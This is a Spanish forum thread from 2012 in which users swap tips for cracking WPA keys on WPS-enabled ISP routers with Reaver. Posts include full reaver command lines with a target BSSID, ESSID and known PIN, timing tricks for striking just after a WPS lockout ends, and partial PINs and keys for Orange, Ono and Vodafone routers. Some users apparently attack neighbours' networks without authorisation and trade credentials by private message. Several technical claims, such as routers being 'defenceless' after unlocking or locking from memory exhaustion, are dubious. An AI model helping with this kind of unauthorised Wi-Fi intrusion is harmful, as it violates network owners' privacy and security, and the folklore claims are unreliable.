si lo pones tal cual me lo as puesto no va a salir nada porque el pin tiene que ir antes del -vv eso primero, el -c x significa el canal del ap. Pues a ver yo e usado wifiway 3.4 en una maquina virtual, porque si lo ejecuto como un live cd parece ser que me lo bloquea, y una vez probando me descargue el virtualbox y parece ser que bloquea el primer intento pero cuando se desbloquea el router, hasta que pasa nose si son media hora o una hora, en ese periodo utiliza el reaver porque sino cuando se desbloquea, y pasa ese tiempo, actualiza su firewall y sus datos y cuando utilizas el reaver te va a bloquear. Yo pienso que estos routers se sacan la clave asi o al menos el que e usado yo si. Luego tienes que poner todo lo mas completo posible ejemplo: reaver -i mon0 -b 00:19:70:xx:xx:Xx -c x -e orange-xxxx -p 6496xxxx -vv y haciendo eso no demora tanto (si lo utilizas en el periodo de media hora o 1 hora después de bloquearse) lo pones le das a enter y en 30 segundos tienes la clave. espero que te sirva salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 19 Agosto 2012, 23:09 pm
ya pero algunas veces me envia m6 tambien y esque sigo teniendo mi duda de si me dara la clave o no esa vodafone por que ese error p3uede por el router pero puede que me de la calve voy por el 32% a ver si alguien me puede orientar saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 19 Agosto 2012, 23:09 pm
pues yo en esta red e especificado todo y lo e puesto lo mas completo posible claro que yo creo que me a dado la clave porque al desbloquearse, el router esta como indefenso y si le atacas te da la clave, después de la media ora o 1hora, se actualiza y se ace invencible.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 19 Agosto 2012, 23:11 pm
P4nd3m0n1um te importaria decirme el comando que tu pones en reaver para sacar la clave wpa2 haber si yo intentandolo de otra forma soy capaz de sacar la clave el comando exacto que tu pones por que yo lo  hago de otra forma y nunca lo saco por favor.

Código:
reaver -i <Interfaz> -b <MAC Address> -vv


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 19 Agosto 2012, 23:14 pm
ya pero algunas veces me envia m6 tambien y esque sigo teniendo mi duda de si me dara la clave o no esa vodafone por que ese error p3uede por el router pero puede que me de la calve voy por el 32% a ver si alguien me puede orientar saludos

Si envías un M6 te faltaría el ultimo dígito; pero seria imposible porque ya deberías estar en el 99% del diccionario para enviarlo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 19 Agosto 2012, 23:17 pm
P4nd3m0n1um ese es el comando que yo mando normalmente y nunca me saca la clave se keda a media intentare el que me dice adrihamel.

adrihamel : te mande un mensaje privado hace unos minutos mira haber si te ha llegado hazme el favor dame el pin completo por privado es facil de mandarme el mensaje picha donde pone el sevi y abajo de mi perfi puede enviarme el mesanje pribado hazme ese favor tio quiero porbar lo que haz echo .m pin creo que de algo te habra servido digo yo verdad aunque tu hayas sacado otro pin .contesta por fa por pribado y mandame los datos tio hazme el favor .


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 19 Agosto 2012, 23:18 pm
ves po eso es lo que me extraña tambien que voy por el 32% y me envia algunas veces en el mensaje que he puesto anteriormente me envia m6 alguien cree que con ese mensaje de m2 m2d m6 me dara la clave en el 90%


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 19 Agosto 2012, 23:26 pm
GOolden Iyo intenta el comando del que puso en el reaver adrihamel haber si te sirve yo lo probare después pademonium no creo que deje tonto el reaver por que le ponga otro comando mas especificado digo yo el truco esta antes de que se desbloque meterle el otro comando mas especificado y se supone que saca la clave verdad .


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 19 Agosto 2012, 23:30 pm
elsevi ya te e respondido al privado te e dejado la mac el nombre la clave y el pin si necesitas algo mas solo preguntamelo.
Yo con el reaver 1.4 e sacado una onoxxxx con mac C4:3D:C7 y puedo afirmar que la clave son 10 números y corresponde a 7 números del numero pin. tiene cifrado wpa2 psk o sea quedaría xxXXXXXXXx pero tengo un problema a ver si alquien me ayuda. Cuando me conecto me pone acceso a internet pero navega mui lento y las pagians tarda 3 minutos o mas en cargarla. e entrado en la configuración del router y es un netgear. Alquien sabe porque navego muy despacio? cuantos megas tiene este router? que debo hacer para que me llegue 50 megas o por hay? es que no me llega ni a los 300 kbs de bajada y e estado buscando por internet y dicen que este rouer para el wifi es penoso es eso cierto? salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 19 Agosto 2012, 23:33 pm
elvesi pruebalo y cuentame me gustaria saber si la sacas o no adrhian como tienes la ono lejos o cerca mas datos sobre el router has sacado tu alguna vodafone


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 19 Agosto 2012, 23:33 pm
no elsevi  si esta bloqueado no te va a dejar hacer nada porque te dira ap limited o algo asi es cuadno se desbloque a ver imagina que tarda 5 días justos pues justo cuando se dsbloque tienes nose si es media ora o 1 hora hay el router esta desbloqueado pero esta indefenso hay si le atacas te da la clave cuadno pasa de ese tiempo actualiza sus datos y ya no te deja hacer nada nose si me explico.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 19 Agosto 2012, 23:41 pm
adrihamel SI aora creo que si lo entendido el truco si se puede ser esta cuando se desbloque despues de esos 5 dias aprovechar esa hora que te deja atacarle para desbloquear el ruter que se supone que esta debilitado y atacarle en ese momento verdad sera en estas orange oye dime que tipo de encritapcion es esa orange wp2 y que mas por fa


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 19 Agosto 2012, 23:50 pm
GOolden pues tengo un adaptador aqprox 300 mbs wifi n con antena 14 db y con el homedale me dice que esta a -56 db pero nose cuadno me conecto la velocidad me varia cuando entro en el router en configuración pone para elegir la velocidad de entre 54, 145 o 300 y estaba en 145 i lo puse en 300 para mayor velocidad, el canal esta puesto en auto pero cuadno me conecto con el adaptador me pone que la velocidad es de 6.5 mbs o 2 o asta 1 cuadno deberia ir a 300 ya que el router y el adaptador están puestos en 300 mbs no? que puedo hacer? es verdad que este router es penoso en el wifi? Vodafone?  pues no, estoy haciendo pruebas con una con mac 00:24:d2 y la v de Vodafone esta en mayúsculas y es 802.11 g sabeis algo de estas redes?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 19 Agosto 2012, 23:51 pm
si eso es a mi asi me a funcionado y al estar indefenso (siempre y cuando sepas los 8 dígitos del pin) te da la clave en un plis plas jaja


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 19 Agosto 2012, 23:57 pm
adrihamel vale muchas gracias por darme los datos y esa información claro si no sabes los 8 digitos exacto me imagino que sera muy dificil de encontrar esa clave me imagino bueno muchas gracias amigos. Probare como tu has echo .


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 20 Agosto 2012, 00:02 am
supongo que será difícil que te de la clave aun estando desabilitado. Porque si tu pones los 8 dígitos el router cree que eres un cliente y te devuelve la clave pero si solo pones los 4 dígitos pues supongo que te pasara al 91 por ciento pero tiene que darte la clave antes de la hora sino se volverá a bloquear.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 20 Agosto 2012, 00:09 am
alquien a sacado alguna red de onoXXXXXX donde las x son números con mac e0:69:95?  una red de onoxxx con mac 5c:35:3b? una vodafonexxxx con mac 5c:4c:a9? o una wlan_xxxx con mac 00:19:15?'


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 20 Agosto 2012, 00:09 am
aam vale gracias probare como tu me has dicho . ;D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 20 Agosto 2012, 00:10 am
adrihamel y que redes has sacado por que yo estoy intentando con una vodafone haber que pasa quizas ese router de ono  tenga muy baja velocidad o sea antiguo depende de tu adaptador o que el dueño baje la velocidad de adsl y como te va con la vodafone esa saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 20 Agosto 2012, 00:14 am
yo tengo una vodafone con esa mac 5c:4c:a9 la pillo y lo he probado va cambiando de pin pero me sale
  • Sending M2 message
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending M2D message
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending WSC ACK
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of the pin yet!
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Got packet type 19 (0x13), but haven't broken the first half of the pin yet!
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending M6 message
  • [!] WARNING: Receive timeout occurred
  • Trying pin 84405678 haber que opinas


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 20 Agosto 2012, 00:21 am
GOolden  pues e sacado una onoxxxx con mac C0:3F:0E, otra de onoxxxx con mac A0:21:B7, otra de ono con mac C4:3D:C7 y una de orange con mac 00:19:70 y ya esta pero estoy intentando sacar alguna de onoxxxxxx o la de Vodafone 5c:4c:a9 pero estas dos ultimas nose como sacarlas. No creo que sea antiguo porque le pusieron hace poco porque yo ese ace un mes no le avia visto por eso digo que si es problema de mi adaptador, de la velocidad del router o es que netgear es penoso por wifi? porque yo e puesto por google el porque tan bajísima velocidad y a mucha gente le pasa eso que por wifi no les llega ni al mega de bajada teniendo el router de 50 megas. Pues nada me sale todo el rato warnig ap limited nose que de reconectar dentro de 60 segundos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 20 Agosto 2012, 00:24 am
GOolden lo que te pasa a ti es que no existe comunicación entre tu adaptador y el router, tu envias un M2 al router pero no obtienes respuesta o el router no lo entiende pero a mi me sale todo el rato ap limited reconectar en 60 segunos i nose parece que estos routers son invencibles jaja


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 20 Agosto 2012, 00:27 am
adrihamel wlan_xxxx con mac 00:19:15 intentalo sacar con el wifiauditor saca todas las walla_xxxx de encriptacion WPA no se si esa es wpa te servira y si la quieres sacar con el reaber el pin es el 12345670


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 20 Agosto 2012, 00:31 am
adrihamel pues ve diciendome tu pogreso con esa vodafone con la mac esa que es un huawei porque yo estoy intentando con la vodafone esa que he dicho anteriormente y me sale ese mensaje


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 20 Agosto 2012, 00:33 am
elsevi el wifiauditor  se utiliza bajo Windows o desde la plataforma android? poeque ese programa me suena averlo visto en android pero por si acaso voy a probarlo, pero el wifiauditor creo que no me serviría por dos razones, primero porque la que voy a auditar a cambiado el nombre y a puesto un nombre de un animal y esta claro que la clave no es la que tiene por defecto y ya lo e echo con el reaver e puesto reaver -i mon0 -b 00:19:15:xx:xx:xx -vv y el primer pin que intenta es el 12345670 pero cuadno le doy enter me pone wearing ap limited reintentar en 60 segundos o algo asi en ingles. Tiene el wps activado y como el reaver aun que cambies la contraseña te da la clave cambiada me vendría genial pero me dice todo el rato eso. Tengo una señal de -49 db


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 20 Agosto 2012, 00:35 am
GOolden no tengo echo ningún progreso ni nada porque cuadno pongo los comandos al primer pin se bloquea i me sale eso y si se desbloquea prueba el mismo pin que viene el primero el 12345670 pero se vuelve a bloquear a mi lo que te sale a ti no me sale no llega a ponerse eso.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 20 Agosto 2012, 00:38 am
que tarjeta tienes que atti no te sale eso con esa vodafone o dime los comdandos saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 20 Agosto 2012, 00:39 am
wifiauditor no se si esta para androy pero para windows 7 si esta y va de lujo se conecta direcctameente no entiendo que dices que la clave es de un animal eso ya no se si sirva  ese programa es para clave por defecto con wla_xxxx. prueba haber saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 20 Agosto 2012, 00:46 am

adrihamel tu problema es que ese router tecom de movistar y el error tuyo esque prueba el ismo pin eso es porque el router aunque tenga el wps activo no tiene ningun pin asignado entonces por eso siempre prueba ese 12345670 y ese seria el de defecto para eso router entonces no te funcina


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 20 Agosto 2012, 00:49 am
GOolden pues tengo una inter core i5 con una tarjeta grafica asus rog Ares que me costo muchísimo conseguirla pero para auditar las redes esta de maravilla pero esa de Vodafone siempre me sale lo mismo wearing ap limited reconexión 60 segundos pruebe a cualquier ora del dia siempre me sale lo mismo y al primer lanzamiento del pin.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 20 Agosto 2012, 00:52 am
elsevi  jaja me refiero a que no es wlan_xxxx sino que el nombre de la red es el nombre de un animal no lo pongo por seguridad jaja por ejemplo la red se llama perro y creo que ya se cual es, se necesita el java o algo de eso no? pero sirve para las 00.19:15? y con el nombre cambiado?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 20 Agosto 2012, 00:54 am
si ya te entiendo lo que me dices pero si tiene el ssid cambia no se , si sirvira een y si necesita tener el java descargate el mas nuevo y te descarga el program y prueba haber haber si  se conecta.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 20 Agosto 2012, 00:55 am
GOolden entonces esa no se puede auditar? pues vaya desilusion :( pero tambin e probado con otra red 00:19:15 y tampoco me da la clave y esta red viene con todo por defecto pero nose si tiene algún pin asignado. Pero cuando tienes activado el wps… el router no pone un pin?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 20 Agosto 2012, 00:56 am
elsevi eso es lo que voy a hacer pero al tener el nombre cambiado pues el programa no detectara que sea una wlan_xxxx porque para obtener la contraseña necesitas el nombre y la mac y si el nombre esta cambiado dudo mucho que se pueda obtener la clave pero por intentarlo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 20 Agosto 2012, 00:58 am
eso te sale por que el router ese esta bloqueado a los intentos de pines algunos routers se bloquean y eso esque alguien mas esta intentando hackeandolo y lo ha dejado bloqueado temporalmente espera a que se desbloquee


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 20 Agosto 2012, 01:05 am
GOolden y cuanto tiempo tarda en desbloquearse? pero si dices tu que ese router no tiene pin asignado de que me va a servir que este desbloqueado? y no se puede hacer nada?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 20 Agosto 2012, 01:10 am
yo digo el wlan_xxxx no tiene el pin asignado que router tienes bloqueado el vodafone


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 20 Agosto 2012, 01:13 am
GOolden ahh ya me e liado jaja ya pero esque lo e probado a cualquier hora del dia por la mañana tarde y noche y ahora a las 4 de la mañana lo volveré a probar ya que no hay nadie para hackearlo si consigo algo lo posteo aquí y te cuento


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 20 Agosto 2012, 01:29 am
no elsevi  si esta bloqueado no te va a dejar hacer nada porque te dira ap limited o algo asi es cuadno se desbloque a ver imagina que tarda 5 días justos pues justo cuando se dsbloque tienes nose si es media ora o 1 hora hay el router esta desbloqueado pero esta indefenso hay si le atacas te da la clave cuadno pasa de ese tiempo actualiza sus datos y ya no te deja hacer nada nose si me explico.

jaja que era un tipo el router.. ajajja el router se bloquea porque se queda sin CPU y Memoria, ahora ya no uso routers convencionales asique se los voy a mostrar en un Mikrotik RB751U-2HnD de 1W:

(http://i.minus.com/i1q3tXqlMJfpJ.PNG)

10% de CPU para un solo usuario navegando y consumiento 16.7Mb de Memoria; en si he tenido a mas de 50 usuarios sin problemas.. no es cualquier router...

pero al momento de atacar por WPS, llenamos la memoria al tope, tanto que no le es posible liberar la memoria ya que el router no tiene la suficiente para realizar este proceso y así queda muerto hasta que algún día un usuario se desconecta y libera esa parte de memoria para poder desbloquearse nuevamente.

adrihamel tu problema es que ese router tecom de movistar y el error tuyo esque prueba el ismo pin eso es porque el router aunque tenga el wps activo no tiene ningun pin asignado entonces por eso siempre prueba ese 12345670 y ese seria el de defecto para eso router entonces no te funcina

Entra por terminal y fíjate... yo creía lo mismo de los thomson.



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Seaworth en 20 Agosto 2012, 11:18 am
elsevi ya te e respondido al privado te e dejado la mac el nombre la clave y el pin si necesitas algo mas solo preguntamelo.
Yo con el reaver 1.4 e sacado una onoxxxx con mac C4:3D:C7 y puedo afirmar que la clave son 10 números y corresponde a 7 números del numero pin. tiene cifrado wpa2 psk o sea quedaría xxXXXXXXXx

Creo que para alguna OnoXXXX (no sé si todas), el PIN por lo visto son los números 2 a 8 de la clave (numérica) WPA, más un número más (¿un dígito de control?).

Por ejemplo, si la clave WPA es 1234567890, el PIN sería 23456788. O, inversamente, si el PIN es
12345678, la clave WPA sería X1234567XX.

Corregirme si me equivoco...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 20 Agosto 2012, 12:33 pm
Seaworth las claves numéricas de onoxxxx con cifrado wpa2 son como tu dices, me equivoque cuando puse la clave jaja la que tengo yo es asi xXXXXXXXxx, y e estado mirando la clave en relación con el nombre y la mac y  el primer numero y los dos últimos están en la mac de la red... coincidencia?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 20 Agosto 2012, 13:11 pm
habeis sacado alguna vodafone con las siguientes mac 64:16:f0 5c:33:a9 haber si alguno de vosotros teneis mas datos sobre la vulnerabilidad de reaver con estas dos redes si pilla alguno de estas redes que pruebe haber como le va saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 20 Agosto 2012, 15:24 pm
GOolden estoy con el wifislax 4.2 y utilizando wpscrackgui 1.8 creo que ahora me sale lo mismo que a ti ya no pone ap limited ni nada de eso y parece ser que no se bloquea ni nada jaja lo e puesto sin pin ni nada y voy por el 5 por ciento y ya llevo 4 horas con el. Que pin utilizaste?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 20 Agosto 2012, 15:41 pm
adrhamel ya se te quito el bloqueo y estas ya con la vodafone y te sale esos errores tambien pos sigue asin y ves avisandome haber el avance que tienes con esa red no yo todavia no he conseguido el pin voy por el 32% haber por eso quiero que me digas el avance que tienes con esa vodafone


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 20 Agosto 2012, 16:39 pm
GOolden te voy a mirar esa mac que tu dices espera por que creo que yo la tengo pero coincide los 3 primetos octeto de la mac haber yo tengo esta mac asin todo  en mayusculas no se por que a ti te sale la f minuscula mira : 64:16:F0:49:AF:B9  es muy parecida a la tuya te puede ayudar esta mac tengo la clave y todo en.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 20 Agosto 2012, 16:50 pm
GOolden pues con una red vodafone sin saber el pin ni nada y que se bloque cada x pins y vas por el 32 por ciento eso es un gran logro por cierto que M envias y que M recibes? nadie tiene informacion de las Vodafonexxxx con v mayusculas y con mac 00:24:2d? tiene el wps activado pero nose si tendra algun pin especifico.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 20 Agosto 2012, 17:05 pm
ya pero me envia m6 m2 y m2d algunas veces pero no pasa al 90 es raro pero estoy intentando elvesi y como tienes la clave me gustaria que me ayudaras saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 20 Agosto 2012, 17:17 pm
Haber tengo la clave por que de esa mac que no es entera la mac coincide con lo que te he dicho los primero numero que ya es importante tiene que tener un patron por que el router le dio de baja entoces le pedi permiso  y coji la mac el modelo y la clave wpa por defecto y lo apunte por si alguna dia me hacia falta no se si te sirvira si quiere te doy la clave que no se sera lo mismo por que los ultimos numero de la mac cambia pero tendra que ser igual si kieres te lo doy por privado


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 20 Agosto 2012, 17:21 pm
yo nesecito ayuda en reaver con esa red de vodafone que me enviaa el error que puse anteriormente pero que va cambiando de pin y me envia m2d y algunas veces m6 y no entido y neecesito una opinion de si conseguire la clave y el pin


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 20 Agosto 2012, 17:21 pm
elsevi cojes tu una por tu zona alguna orange-xxxx con mac 5c:33:8e y con mac c0:ac:54?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 20 Agosto 2012, 17:32 pm
EN mi zona si la cojo pero lejos de donde yo vivo y la mac es asin no se por que la pones en minuscula son mayusculass es asin :la que yo cojo aqui pero no la he desisfrado ni nada esta en otra zona de donde yo vivo me entiendes 5C:33:8E:DE:E5:B6 VERDAD porla en mayuscula tio no en minuscula es raro que la mac salga alguna minúscula. QUE kieres saver el pin :


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 20 Agosto 2012, 17:38 pm
elsevi como te va con la red esa de orange has conseguido ya algo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 20 Agosto 2012, 17:43 pm
GOolden: Pues lo intente ayer por la noche otra vez y seguia bloqieado el router lo que me  estoy dando cuenta que veo que es muy importate llevar bienas las hora y los minutis casi exacto cuando se desbloquea el router solo y aprovecha para atacarlo lo voy a intentar despues mas tarde haber si se ha bloqueado por que como dice adrihamel es importae  el tiempo de cada router que atacas calcular y atacarle con el pin que sea mas o menos extaco lo he leeido en un foro y tienes las hora contada cada router jaja haber si tengo yo suerte te estoy mirando esa de vofadon haber si tienes pin que es lo que tu querrass verdad.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 20 Agosto 2012, 17:43 pm
elsevi jaja si es en mayusculas ^^ esque estas redes creo a ver leido que a los 10 pins se bloquean y e intentado con mi metodo de cuando se desbloquean atacarlas pero parece ser que no es como la que yo consegui esta parece mas fuerte si teneis datos de estas redes pasarmelos para ver que tienen en comun. Pues si tienes el pin de alguna de ellas pues pasamelo por privado para ver si aki donde yo vivo funcionan.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 20 Agosto 2012, 18:03 pm
adrihamel : orange-c6  
ap mac-5c:33:8E:xx:xx:xx
wps locked-si
pin-1111xxxx no viene el pin completo lo demas lo tendras que averiguar yo esta no lo he intentado nunca haber si tienes suerte .
iyo lo demas hablamos por pribado mejor por que va aparecer este es pot un chat tio jajaja y vaya se que se enfaden los moderadores aunque estamos poniendo datos claro lo demas hablamos por pribado mejor tio haber si sacamos algo de las orange respondeme a los privados. ;D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 20 Agosto 2012, 23:45 pm
Un Ejemplo:

(http://i.minus.com/iwJ2n4BRd7Fz1.jpg)

MAC: C83A35111520
PIN: 11195207
SERIAL: E188A111220000215

Tomamos la MAC: C83A35111520
le quitamos los primeros 6 digitos: 111520
separamos los primeros 3 digitos: 111?520?
Entre el primer ? sumamos los digitos, primer ? 1+1+5+2 = 9
PIN = 1119520?
Ahora sumamos los primeros digitos del segundo ? y nos da: 5+2+0 = 7
PIN = 11195207

En realidad es casualidad..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 21 Agosto 2012, 00:00 am
P4nd3m0n1um : SI yo tengo en los 3 primeros dígitos por EJEMPLO esto 4138C5 ¿Como sumo la letra mayúscula  C con los  números ? ¿Asín puedo sacar el pin exacto de cualquier router de Orange o de la que sea? dime por favor


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 21 Agosto 2012, 00:13 am
P4nd3m0n1um : SI yo tengo en los 3 primeros dígitos por EJEMPLO esto 4138C5 ¿Como sumo la letra mayúscula  C con los  números ? ¿Asín puedo sacar el pin exacto de cualquier router de Orange o de la que sea? dime por favor

Di un ejemplo, no dije que funcione. Ademas quien dice que no necesites los primeros 6 dígitos? o el numero de serie..?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 21 Agosto 2012, 00:19 am
si un ejemplo que no sirve P4nd3m0n1um por que casi todas las mac llevan al final letras y numero entonces las letras no tienen un valor pues vaya contestación que me das me rompe todo lo esquemas si sabes no se dime alguna forma esa forma ha sido casualidad y tu sabes de sobra que todas la inmensa mayoria de las mac lleva letras y numeros entoces  no sirve para nada o si tu saves alguna forma dimelo. Entoces tu estas dando a entender que no funciona con letras la suma de los 6 digitos finales.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 21 Agosto 2012, 00:27 am
si un ejemplo que no sirve P4nd3m0n1um por que casi todas las mac llevan al final letras y numero entonces las letras no tienen un valor pues vaya contestación que me das me rompe todo lo esquemas si sabes no se dime alguna forma esa forma ha sido casualidad y tu sabes de sobra que todas la inmensa mayoria de las mac lleva letras y numeros entoces  no sirve para nada o si tu saves alguna forma dimelo. Entoces tu estas dando a entender que no funciona con letras la suma de los 6 digitos finales.

Claro.. pues no sabes que es una MAC Address:

Dirección MAC

En las redes de computadoras, la dirección MAC (siglas en inglés de media access control; en español "control de acceso al medio") es un identificador de 48 bits (6 bloques hexadecimales) que corresponde de forma única a una tarjeta o dispositivo de red. Se conoce también como dirección física, y es única para cada dispositivo. Está determinada y configurada por el IEEE (los últimos 24 bits) y el fabricante (los primeros 24 bits) utilizando el organizationally unique identifier. La mayoría de los protocolos que trabajan en la capa 2 del modelo OSI usan una de las tres numeraciones manejadas por el IEEE: MAC-48, EUI-48, y EUI-64, las cuales han sido diseñadas para ser identificadores globalmente únicos. No todos los protocolos de comunicación usan direcciones MAC, y no todos los protocolos requieren identificadores globalmente únicos.

Las direcciones MAC son únicas a nivel mundial, puesto que son escritas directamente, en forma binaria, en el hardware en su momento de fabricación. Debido a esto, las direcciones MAC son a veces llamadas burned-in addresses, en inglés.
Si nos fijamos en la definición como cada bloque hexadecimal son 8 dígitos binarios (bits), tendríamos:

6 * 8 = 48 bits únicos

En la mayoría de los casos no es necesario conocer la dirección MAC, ni para montar una red doméstica, ni para configurar la conexión a internet, usándose esta sólo a niveles internos de la red. Sin embargo, es posible añadir un control de hardware en un conmutador o un punto de acceso inalámbrico, para permitir sólo a unas MAC concretas el acceso a la red. En este caso, deberá saberse la MAC de los dispositivos para añadirlos a la lista. Dicho medio de seguridad se puede considerar un refuerzo de otros sistemas de seguridad, ya que teóricamente se trata de una dirección única y permanente, aunque en todos los sistemas operativos hay métodos que permiten a las tarjetas de red identificarse con direcciones MAC distintas de la real.

Eso quiere decir que puedes pasar los octetos a decimal...

Sistema hexadecimal

El sistema numérico hexadecimal o sistema hexadecimal (a veces abreviado como Hex, no confundir con sistema sexagesimal) es un sistema de numeración que emplea 16 símbolos.

(http://upload.wikimedia.org/wikipedia/es/math/0/2/b/02b5638b774f8fd3248b37829dc58f47.png)

Se debe notar que A = 10, B = 11, C = 12, D = 13, E = 14 y F = 15. En ocasiones se emplean letras minúsculas en lugar de mayúsculas. Como en cualquier sistema de numeración posicional, el valor numérico de cada dígito es alterado dependiendo de su posición en la cadena de dígitos, quedando multiplicado por una cierta potencia de la base del sistema, que en este caso es 16. Por ejemplo: 3E0A16 = 3×163 + E×162 + 0×161 + A×160 = 3×4096 + 14×256 + 0×16 + 10×1 = 15882.



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 21 Agosto 2012, 00:28 am
hola elsevi como esa orange ya se ha desbloqueado yo ahora estoy con una fte de orange


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 21 Agosto 2012, 00:32 am
Mi amigo tiene un router tenda que ya no utiliza y la mac es C8:3A:35:F8:57:D8 y el pin es 38577856 y nose si segura el mismo truco que el tuyo P4nd3m0n1um porque el final de la mac lleva letras. Algo en concreto?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 21 Agosto 2012, 00:41 am
Mi amigo tiene un router tenda que ya no utiliza y la mac es C8:3A:35:F8:57:D8 y el pin es 38577856 y nose si segura el mismo truco que el tuyo P4nd3m0n1um porque el final de la mac lleva letras. Algo en concreto?


Claro.. pues no sabes que es una MAC Address:

Dirección MAC

